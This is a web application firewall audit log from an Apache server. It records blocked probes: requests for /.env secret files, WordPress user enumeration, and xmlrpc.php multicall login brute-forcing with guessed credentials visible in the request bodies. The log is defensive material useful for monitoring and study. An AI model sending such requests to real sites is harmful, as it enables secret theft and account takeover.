Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748417503533910 889 (- - -) Stopwatch2: 1748417503533910 889; combined=371, p1=325, p2=0, p3=0, p4=0, p5=45, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --692fec6f-Z-- --60caab44-A-- [28/May/2025:15:05:38 +0700] aDbD0uszXCullgn3bbGmlwAAAAQ 103.236.140.4 37012 103.236.140.4 8181 --60caab44-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.28.242.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.28.242.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --60caab44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60caab44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748419538819955 3198 (- - -) Stopwatch2: 1748419538819955 3198; combined=1390, p1=495, p2=863, p3=0, p4=0, p5=32, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60caab44-Z-- --6997b66c-A-- [28/May/2025:15:24:59 +0700] aDbIW-szXCullgn3bbGmrgAAABA 103.236.140.4 37158 103.236.140.4 8181 --6997b66c-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 34.143.249.229 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 34.143.249.229 Accept-Encoding: gzip X-Varnish: 169286952 --6997b66c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6997b66c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748420699233156 809 (- - -) Stopwatch2: 1748420699233156 809; combined=325, p1=285, p2=0, p3=0, p4=0, p5=39, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6997b66c-Z-- --bb889276-A-- [28/May/2025:15:24:59 +0700] aDbIWw3r-0gDryHAyD_E1QAAAE8 103.236.140.4 37166 103.236.140.4 8181 --bb889276-B-- GET /sendgrid/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 34.143.249.229 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 34.143.249.229 Accept-Encoding: gzip X-Varnish: 169286955 --bb889276-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bb889276-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748420699382818 827 (- - -) Stopwatch2: 1748420699382818 827; combined=312, p1=274, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb889276-Z-- --39f05039-A-- [28/May/2025:15:24:59 +0700] aDbIW_nnEwDNUSjDseIWbAAAAIs 103.236.140.4 37174 103.236.140.4 8181 --39f05039-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 34.143.249.229 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 34.143.249.229 Accept-Encoding: gzip X-Varnish: 169286958 --39f05039-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --39f05039-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748420699511450 714 (- - -) Stopwatch2: 1748420699511450 714; combined=269, p1=233, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39f05039-Z-- --a290a100-A-- [28/May/2025:15:44:31 +0700] aDbM7xwBHP_x2VCWa06B8gAAANM 103.236.140.4 37346 103.236.140.4 8181 --a290a100-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.30 (Nintendo Wii; U; ; 2047-7; en) Accept-Charset: utf-8 --a290a100-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a290a100-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748421871433009 900 (- - -) Stopwatch2: 1748421871433009 900; combined=400, p1=362, p2=0, p3=0, p4=0, p5=38, sr=160, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a290a100-Z-- --4c8e7271-A-- [28/May/2025:15:49:14 +0700] aDbOChwBHP_x2VCWa06B_gAAANA 103.236.140.4 37398 103.236.140.4 8181 --4c8e7271-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT Accept-Charset: utf-8 --4c8e7271-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c8e7271-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748422154639430 759 (- - -) Stopwatch2: 1748422154639430 759; combined=311, p1=272, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c8e7271-Z-- --3e6f9c2a-A-- [28/May/2025:16:07:03 +0700] aDbSN_nnEwDNUSjDseIWmQAAAIs 103.236.140.4 37764 103.236.140.4 8181 --3e6f9c2a-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 154.72.27.50 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 154.72.27.50 X-Forwarded-Proto: http Connection: close Content-Type: text/html; charset=utf-8 --3e6f9c2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e6f9c2a-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748423223937156 862 (- - -) Stopwatch2: 1748423223937156 862; combined=318, p1=280, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e6f9c2a-Z-- --afd64b3b-A-- [28/May/2025:16:19:52 +0700] aDbVOBwBHP_x2VCWa06E9AAAANE 103.236.140.4 49900 103.236.140.4 8181 --afd64b3b-B-- GET / HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 111.119.193.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.119.193.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.4 Safari/532.1 Proxy-Connection: close --afd64b3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afd64b3b-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748423992014848 2327 (- - -) Stopwatch2: 1748423992014848 2327; combined=1070, p1=444, p2=595, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afd64b3b-Z-- --013c211b-A-- [28/May/2025:17:00:23 +0700] aDbet_nnEwDNUSjDseIkLgAAAI8 103.236.140.4 36352 103.236.140.4 8181 --013c211b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 84.247.150.34 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 84.247.150.34 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --013c211b-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel#2020 --013c211b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --013c211b-E-- --013c211b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 84.247.150.34 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748426423677273 5664 (- - -) Stopwatch2: 1748426423677273 5664; combined=4128, p1=473, p2=3491, p3=0, p4=0, p5=97, sr=84, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --013c211b-Z-- --0a9c804e-A-- [28/May/2025:17:10:22 +0700] aDbhDhwBHP_x2VCWa06Q1QAAAME 103.236.140.4 36906 103.236.140.4 8181 --0a9c804e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 62.210.124.187 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 62.210.124.187 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0a9c804e-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadil!rizalfadil! --0a9c804e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a9c804e-E-- --0a9c804e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.210.124.187 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748427022321866 5741 (- - -) Stopwatch2: 1748427022321866 5741; combined=4631, p1=521, p2=3830, p3=0, p4=0, p5=156, sr=84, sw=124, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a9c804e-Z-- --2fb29c76-A-- [28/May/2025:17:20:46 +0700] aDbjfg3r-0gDryHAyD_UcgAAAEo 103.236.140.4 37744 103.236.140.4 8181 --2fb29c76-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 222.253.125.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 222.253.125.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2fb29c76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fb29c76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748427646983321 3155 (- - -) Stopwatch2: 1748427646983321 3155; combined=1421, p1=467, p2=923, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fb29c76-Z-- --70a59c0d-A-- [28/May/2025:17:32:42 +0700] aDbmSg3r-0gDryHAyD_U1gAAAEM 103.236.140.4 38596 103.236.140.4 8181 --70a59c0d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.254.241.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.254.241.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --70a59c0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70a59c0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748428362309210 2853 (- - -) Stopwatch2: 1748428362309210 2853; combined=1392, p1=456, p2=904, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70a59c0d-Z-- --4d39a439-A-- [28/May/2025:17:48:53 +0700] aDbqFQ3r-0gDryHAyD_V3AAAAEM 103.236.140.4 40022 103.236.140.4 8181 --4d39a439-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4d39a439-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantix.2020 --4d39a439-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d39a439-E-- --4d39a439-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748429333954433 6289 (- - -) Stopwatch2: 1748429333954433 6289; combined=4430, p1=515, p2=3737, p3=0, p4=0, p5=107, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d39a439-Z-- --18ad9242-A-- [28/May/2025:18:04:15 +0700] aDbtrw3r-0gDryHAyD_WPwAAAEM 103.236.140.4 41562 103.236.140.4 8181 --18ad9242-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 200.129.85.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 200.129.85.6 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --18ad9242-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantix-2022 --18ad9242-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18ad9242-E-- --18ad9242-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 200.129.85.6 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748430255117303 6449 (- - -) Stopwatch2: 1748430255117303 6449; combined=4500, p1=527, p2=3805, p3=0, p4=0, p5=100, sr=95, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18ad9242-Z-- --c39c054d-A-- [28/May/2025:18:05:52 +0700] aDbuEBwBHP_x2VCWa06R6AAAANY 103.236.140.4 41630 103.236.140.4 8181 --c39c054d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c39c054d-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantix102030 --c39c054d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c39c054d-E-- --c39c054d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748430352633997 6178 (- - -) Stopwatch2: 1748430352633997 6178; combined=4054, p1=497, p2=3434, p3=0, p4=0, p5=73, sr=84, sw=50, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c39c054d-Z-- --dddc2d00-A-- [28/May/2025:18:10:35 +0700] aDbvKw3r-0gDryHAyD_WXQAAAFU 103.236.140.4 42098 103.236.140.4 8181 --dddc2d00-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 200.129.85.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 200.129.85.6 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --dddc2d00-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel2007 --dddc2d00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dddc2d00-E-- --dddc2d00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 200.129.85.6 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748430635033859 3520 (- - -) Stopwatch2: 1748430635033859 3520; combined=2736, p1=315, p2=2288, p3=0, p4=0, p5=78, sr=49, sw=55, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dddc2d00-Z-- --c6fab33a-A-- [28/May/2025:18:20:29 +0700] aDbxfQ3r-0gDryHAyD_aEwAAAFg 103.236.140.4 59112 103.236.140.4 8181 --c6fab33a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 200.129.85.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 200.129.85.6 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c6fab33a-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel90 --c6fab33a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6fab33a-E-- --c6fab33a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 200.129.85.6 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) 